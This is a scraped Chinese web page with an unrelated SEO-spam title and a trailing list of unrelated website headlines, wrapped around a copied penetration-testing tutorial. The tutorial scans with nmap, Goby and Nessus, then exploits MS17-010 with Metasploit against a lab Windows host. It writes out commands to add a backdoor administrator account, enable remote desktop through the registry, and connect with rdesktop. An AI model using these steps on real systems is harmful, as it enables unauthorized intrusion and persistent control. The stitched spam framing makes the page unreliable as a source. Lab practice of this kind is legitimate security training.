当前位置: 首页 > news >正文

中国建设银行网站对公账户首页内蒙古企业网站制作

news 2026/5/5 6:30:24
中国建设银行网站对公账户首页,内蒙古企业网站制作,中国建设官方网站登录,网站开发 石家庄操作系统漏洞发现前言一、操作系统漏洞发现1.1 namp2. Goby3. Nessus二#xff0c;进行渗透测试2.1 使用工具进行渗透1. metasploit2.2 EXP2.3 复现文章三#xff0c;操作系统漏洞修复前言 不管是对于App来说#xff0c;还是web站点来说#xff0c;操作系统是必须的#x… 操作系统漏洞发现前言一、操作系统漏洞发现1.1 namp2. Goby3. Nessus二进行渗透测试2.1 使用工具进行渗透1. metasploit2.2 EXP2.3 复现文章三操作系统漏洞修复前言 不管是对于App来说还是web站点来说操作系统是必须的对于任何一个站点进行渗透无非就是渗透如下几个方面 操作系统进行信息收集后查看站点操作系统是否为最新版本如果不是在网上搜索看当前操作系统是否有漏洞出现系统软件进行信息收集后通过看站点所开放的端口可以大致确定对方站点系统所使用的软件入80端口就是http服务端口对方站点应该有web站点开发8080对方站点可能有apache等软件在网上查找看当前apache版本是否有漏洞第三方软件如phpmyadminssh工具等看这个版本的软件是否有漏洞最后一步才是对站点网站进行渗透看网站是否有sql注入逻辑漏洞等 如下是针对操作系统漏洞发现的类容 一、操作系统漏洞发现 想要发现操作系统漏洞不用想肯定是工具扫描啊推荐如下三款工具nampGobynessus。 1.1 namp namp扫描教程 如上教程中的脚本利用就是操作系统漏洞扫描如下是我扫描windows7靶机的结果由于安装的是没有进行更新的windows所以存在该漏洞图如下所示 2. Goby Goby使用的是忍者操作系统上面的忍者操作系统下载忍者操作系统安装教程进行漏洞扫描就如下两步把英文设置为中文之后一切操作都非常简单具体操作如下所示 如上所示点击开始就可以进行漏洞扫描了全部扫描结果以可视化的方式进行展现非常的人性化。 3. Nessus Nessus是三款工具中最优秀的Nessus的安装教程:Nessus安装教程安装好之后就可以进行漏洞扫描了其中的操作在安装教程中有说我这里就不进行重新说明了 二进行渗透测试 2.1 使用工具进行渗透 1. metasploit 开启metasploit及打开metasploit的控制台使用如下两条命令 service postgresql start # 开启数据库postgresq msfconsole # 打开控制台搜索ms17-010可以利用的漏洞模块再次确定是否存在漏洞如下所示 search ms17-010 # 搜索模块 use 3 # 使用第三个模块看目标主机是否存在这个漏洞进一步的确定 show options # 查看需要设置的参数 set rhost 192.168.93.134 # 设置参数目标机器的IP地址为 192.168.93.134 run # 进行攻击exploit命令也可以搜索ms17-010可以利用的漏洞模块对漏洞进行攻击控制目标机器如下所示依次使用如下几条命令 search ms17-010 use 0 # 使用攻击模块攻击主机 show options set rhost 192.168.93.134 设置攻击的目标地址 exploit4. 进行提权等一系列操作 shell # 控制目标机器 net user root 123456 /add # 创建普通用户 net localgroup administrators root /add # 对普通用户进行提权进行如下操作后你打开windows目标机器你会发现多了一个超级管理员用户如下所示 5. 远程访问控制 首先输入REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,打开目标机器的3389端口该端口开放后就可以进行远程连接了 开放端口之后在新的终端进行远程桌面的连接如下所示 rdesktop 192.168.93.134:3389 # 进行远程连接目标机器192.168.93.134是我目标机器的IP地址如上再输入yes就是远程桌面的连接了连接后的结果如下所示 2.2 EXP EXP是漏洞攻击的代码可以进入如下两个网站进行查找如下所示 seebug漏洞平台 国家漏洞安全平台 漏洞利用数据库 2.3 复现文章 复现文章网上都有直接寻找如永恒之蓝 搜索技巧 信息搜集 三操作系统漏洞修复 针对设计错误微软公司会及时推出补丁程序用户只需及时下载并安装即可因此建议用户经常浏览微软的安全公告并及时下载补丁。 对于设置错误则应及时修改配置使系统更加安全可靠。
http://www.hkea.cn/news/14524508/

相关文章:

  • 网站建设完成之后要索取哪些如何做公司网站优化
  • 免费的求职简历模板网站做资讯网站需要哪些资质
  • 徐州网站建设商城制作网站推广seowordpress页脚居中
  • 网站有域名没备案王者荣耀是哪家公司开发的
  • 电子拜年贺卡在线制作网站韩城建设局网站
  • 做兼职网站装修设计师一般多少钱
  • 太原市做网站公司做的网站用户密码在哪里找
  • esc怎么做网站dede静态网站模板下载
  • 最好的网站开发系统如何使用wp做网站
  • 网站建设一般分为几个步骤商业店铺设计
  • 东莞哪里可以学网络营销上海短视频seo优化网站
  • 烟台市建设工程质量监督站网站wordpress多重筛选并排序
  • 包包网站建设可行性分析html5移动网站制作教程
  • 深圳网站专业建设公司免费wordpress模板下载
  • 检测网站是否安全武昌手机网站
  • rails网站开发企业电子商务网站建设规划
  • 网站下拉菜单怎么做宁波网站建设地址在哪
  • 网站建设网站营销网上怎么推销自己的产品
  • 新乡专业做网站的公司哪家好代理网址域名
  • 网站域名的安全性网站后台修改图片集顺序
  • 财政网站平台建设不足wordpress 主题公园
  • 北京时间网站建设广州网站制作有哪些
  • 营销网站建设 公司排名长春seo服务
  • 英文网站 字体大小云建站模板
  • 苏州外贸网站建设优化推广wordpress 页面静态化
  • 手机端app怎么开发已矣seo排名点击软件
  • 威海网站建设吧运动网站建设教程
  • 青岛seo网站排名优化全球外贸采购网
  • 商城网站需要多少钱广州网站建设 骏域网站建设专家
  • 网站百度文库郑东新区网站建设